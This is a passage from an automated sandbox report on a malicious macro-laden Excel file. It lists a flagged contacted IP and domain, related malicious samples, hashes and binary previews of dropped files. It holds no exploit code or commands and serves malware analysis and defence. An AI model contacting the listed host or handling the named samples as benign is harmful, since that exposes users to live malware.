                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?F0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.comF0167333-A0B2-4A84-BBE2-E95029710D76.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      192.185.215.146
                                                                                                                                                      unknownUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:324311
                                                                                                                                                      Start date:29.11.2020
                                                                                                                                                      Start time:05:42:25
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 14s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:document-1425391613.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:23
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.expl.evad.winXLS@3/6@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 168.61.161.212, 52.109.88.177, 52.109.8.24, 51.104.139.180, 2.20.84.85, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.11.168.160, 92.122.213.247, 92.122.213.194, 51.104.144.132
                                                                                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.215.146document-1425391613.xlsGet hashmaliciousBrowse
                                                                                                                                                        document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                          document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                            document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                  document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                    document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                      document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                        document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                          document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                            document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                              document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                                document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            document-1490602303.xlsGet hashmaliciousBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              seligue.netdocument-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490602303.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146

                                                                                                                                                                                              ASN

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              UNIFIEDLAYER-AS-1USdocument-1425391613.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1481025349.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1489938345.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1485961692.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1475836582.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1482091668.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1479658044.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490602303.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19document-1442300824.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1423769819.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1322008235.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1353534916.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1443146531.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1359580495.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-135688950.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1490425384.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1453508098.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1443646287.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1452240368.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1476538535.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1363041939.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              case4092.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1353330392.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146
                                                                                                                                                                                              document-1353428775.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 192.185.215.146

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F0167333-A0B2-4A84-BBE2-E95029710D76
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):129952
                                                                                                                                                                                              Entropy (8bit):5.3783277008510275
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:BcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:rmQ9DQW+zBX8u
                                                                                                                                                                                              MD5:D5C56DC20F791F63C5BA8BA327626C79
                                                                                                                                                                                              SHA1:C5DF070043B263C6E7977AB3C20DEE160A55989E
                                                                                                                                                                                              SHA-256:AB99DB047B5C7857294A0F15558FF7E67B108E01BDAC946AEF6657BC330C760C
                                                                                                                                                                                              SHA-512:2C2A57F383021EFBF673072FF0BF23263F37D96FD2A890A885A446A5B582B51188F4446B19B9C7F428F9139501E34AA6D2A67BC1442A32981BE37654E71DC419
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-29T04:43:20">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\0A910000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):314646
                                                                                                                                                                                              Entropy (8bit):7.985554695503645
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:mBlrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Mve:oFPM8R3AsB+bjej/9cme
                                                                                                                                                                                              MD5:8B39057990D564C6E1ED63481E9C5FCA
                                                                                                                                                                                              SHA1:FFFAA44307FEDCFF2450B6905B8AFA9347B11CE3
                                                                                                                                                                                              SHA-256:8094CF809E4D24ED66A071242B95ADF9156AA69F4FDB8088DC32ABA8E2FFB152
                                                                                                                                                                                              SHA-512:8770076D580A5876E78A439795CF6667E64CE12048630F05E0CA8E58762906658717F07846D44ED5FE82ACFD78D8BCC3CCEDDD5F2AE836DAF077F2533385C9C5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: .V.n.0....?......(..r.izl.$...\K....I..RV.4p,.6.^..vfv....jcM....w5..f..'........WV`.N....l....?.....h.5kS..8G..X...VV>Z..66<...........%p.L..-..a%.L*n6.x.d..+.w.e......".P...+..VZ.....t.!.P..$k..51.;H..C..r....6k...GD08Mf.CE.]*...7....>.q...Q+(nEL?.%....'..K...a.l...6.L.9VY!..qbi..v...0u.......n....t.#::.S.........;.;.........C......=....@....r.f..;...;..m.ik..\....s+"..Dm.9....#:T.OY../N............p.....> .....<O..]....4.3e_...i...1.@....O..........PK..........!.C.T.....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sun Nov 29 12:43:23 2020, atime=Sun Nov 29 12:43:23 2020, length=12288, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                              Entropy (8bit):4.643807693342476
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:8Ad7z3XUlqjuElPCH21YmhNY3+9Rf+WrjAZ/2bDqLC5Lu4t2Y+xIBjKZm:8ANVrL3nAZiDT87aB6m
                                                                                                                                                                                              MD5:04C5E872CA8DD45B85970AF649E84DDC
                                                                                                                                                                                              SHA1:1114249446096B889938F3F6C8AD35C87517110B
                                                                                                                                                                                              SHA-256:2C4FC017C5D153D8C7FDD3F826873274BBDAAB1C940A5E37EC55E83BB5116119
                                                                                                                                                                                              SHA-512:437A5D18824A7D4263E8924F91E2133479DE03123943F8778A5E010A8AEDC1A08796453D6B628FEF7DAE843DE28AF5CFADCF97B020A1D40C5A080FA351006EE9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F........N....-...jI.U...=.G.U....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q]m....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Q]m.....S.....................>..h.a.r.d.z.....~.1.....}Qlm..Desktop.h.......Ny.}Qlm.....Y..............>.....-gj.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......960781...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1425391613.xls.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sun Nov 29 12:43:23 2020, atime=Sun Nov 29 12:43:23 2020, length=338944, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4400
                                                                                                                                                                                              Entropy (8bit):4.685285796858009
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8hy1WjRfpWB6phy1WjRfpWB6prNy1WjRfpWB6prNy1WjRfpWB6:8hyAHWKhyAHWKrNyAHWKrNyAHW
                                                                                                                                                                                              MD5:1AFE8A578487E2F17354209A5EC07A96
                                                                                                                                                                                              SHA1:BDC78E418D80465D45F9685058C13A5D3A9F9F4B
                                                                                                                                                                                              SHA-256:19C0E373B136E82F0704CE13DC62CE903D841FDF6F9EC3CE0750F07A4F912086
                                                                                                                                                                                              SHA-512:33A1C2D2C273F9C3DEAE6F62A6FE683D882B6CF6C154403D5CE5BA755D8F3711BF3219F6DA74D795528B6122EF8DB48E37428BF06EB81F043913AFE4C6EAA993
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F.... ...c.N.:.....P.U.....P.U....,...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q]m....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Q]m.....S.....................>..h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.}Q]m.....Y..............>......r.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..,..}Qgm .DOCUME~1.XLS..`......>Qux}Qgm....h........................d.o.c.u.m.e.n.t.-.1.4.2.5.3.9.1.6.1.3...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1425391613.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.2.5.3.9.1.6.1.3...x.l.s.........:..,.LB.)...As...`.......X.......960781...........!a..%.H.VZAj...W..-.........-..!a..%.H.VZAj...W..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                              Entropy (8bit):4.8166852424295845
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:dj6Y9LllYuELllYOY9LllYuELllYOY9LllYuELllYOY9LllYO:dmFFF4
                                                                                                                                                                                              MD5:D57B0835249B28FAAE4B17C3FCBDD851
                                                                                                                                                                                              SHA1:673A240B8B5ECFECD4A19E8F3D1322887D567534
                                                                                                                                                                                              SHA-256:109ECDC03E53507D1CA095E3C48A8B7ABA09A41EBB09E51261D5C7FEA7BEFAEF
                                                                                                                                                                                              SHA-512:AE915B8BB9D9F6966BC4491E12EC4C5BA7BCBC373933659BA66F421FCA45AD689E41FBC636A00C98AB16F9405347BA31D96CA1ADFE34028DB7557C6FDEF00193
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: Desktop.LNK=0..[xls]..document-1425391613.xls.LNK=0..document-1425391613.xls.LNK=0..[xls]..document-1425391613.xls.LNK=0..document-1425391613.xls.LNK=0..[xls]..document-1425391613.xls.LNK=0..document-1425391613.xls.LNK=0..[xls]..document-1425391613.xls.LNK=0..
                                                                                                                                                                                              C:\Users\user\Desktop\DA910000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):398843
                                                                                                                                                                                              Entropy (8bit):7.192456190293742
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:WcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfd1:Vizo8RnsIROnr6n75Y+x3n
                                                                                                                                                                                              MD5:2DFE6D16EA7DD5A26D88D6228C0843F1
                                                                                                                                                                                              SHA1:A239B62CA11C95ADC662FDC5C368D858C5B19306
                                                                                                                                                                                              SHA-256:80C3C280C00CD6BBA0910BE566807893F70FE956689218D2FBB02F79F105A873
                                                                                                                                                                                              SHA-512:B9D58EA52D0BF869051CCFC387DD59C9FF7E7F0EDEC18DB0A4C3DFEE8F03137AA5C5BE7C3BA19B3DF232E302F54DECFEDF4D57FC91C844EE59282C7E0174A54D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: ........T8..........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1.......>........X..C.a.l.i.b.r.i.1.......?........X..C.a.l.i.b.r.i.1.......4........X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1...,...8........X..C.a.l.i.b.r.i.1.......8........X..C.a.l.i.b.r.i.1.......8........X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1...h...8........X..C.a.m.b.r.i.a.1.......<........X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1................X..C.a.l.i.b.r.i.1

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:46:17 2020, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.523545982744638
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:document-1425391613.xls
                                                                                                                                                                                              File size:338944
                                                                                                                                                                                              MD5:272290a1fec50e7ced8d5447e698cfeb
                                                                                                                                                                                              SHA1:394504cde4fe75c2f22ee5127d83a90d2259f8fc
                                                                                                                                                                                              SHA256:15f053ef9e78c3356fc0eafdd09c1b7e307e985f5a28e1ade7e943ec82ea03ef
                                                                                                                                                                                              SHA512:22c5944a889f35a394f3248e849947200a2b43e9cb7c7088cf2d0408417f7b2512c8f321afdd40c1c679cb3606a0c832859ea2609db6bc19ee8ccba6b3a42c87
                                                                                                                                                                                              SSDEEP:6144:IcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTl:8izo8RnsIROnr6n75YYT
                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "document-1425391613.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                                              Last Saved Time:2020-11-26 09:46:17
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:0

                                                                                                                                                                                              Document Summary

                                                                                                                                                                                              Document Code Page:1251
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                                              Shared Document:False
